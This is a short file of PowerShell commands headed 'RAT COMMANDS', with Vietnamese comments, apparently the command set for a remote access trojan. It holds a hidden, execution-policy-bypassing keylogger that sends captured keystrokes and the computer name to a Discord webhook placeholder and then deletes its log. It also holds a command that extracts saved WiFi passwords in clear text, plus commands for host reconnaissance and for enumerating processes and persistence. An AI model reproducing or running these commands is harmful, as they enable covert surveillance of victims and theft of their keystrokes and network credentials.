# ===================== RAT COMMANDS =====================
# Keylogger với GetAsyncKeyState (đơn giản, reliable)
powershell -nop -w hidden -exec bypass -c "$log='$env:TEMP\k.log';$h='YOUR_DISCORD_WEBHOOK_HERE';while(1){$o='';for($i=8;$i-le190;$i++){if([Windows.Input.Key]::IsKeyDown($i)){$o+=[char]$i;}};if($o){\"$(Get-Date -f 'HH:mm:ss') $o\"|Add-Content $log;};if(Test-Path $log){$c=gc $log -Tail 30;$b=@{content=\"[$($env:COMPUTERNAME)] Keys: $c\"}|ConvertTo-Json;try{irm $h -Method Post -Body $b -ContentType 'application/json'}catch{};ri $log -Force};sleep 5}"

# WiFi passwords extraction
powershell -c "netsh wlan export profile key=clear folder='$env:TEMP\' && (Get-Content '$env:TEMP\*.xml' | Select-String 'keyMaterial' -Context 0,1) 2>$null"

# System information
powershell -c "echo 'Host:';hostname;echo 'User:';whoami;echo 'IP:';ipconfig|findstr IPv4;echo 'OS:';systeminfo|findstr /B /C:'OS Name'"

# Process list (suspicious)
powershell -c "Get-Process | Where-Object {$_.ProcessName -match '(?i)task|svch|rund|reg|wmi'}|Select-Object Name,Id,Path|Format-Table"

# Persistence check
powershell -c "echo '=== STARTUP ===';Get-CimInstance Win32_StartupCommand|Select-Object Name,Command|ft;echo '=== SERVICES ===';Get-Service|Where-Object {$_.StartType -eq 'Auto'}|Select-Object Name,DisplayName|ft -AutoSize"
# =======================================================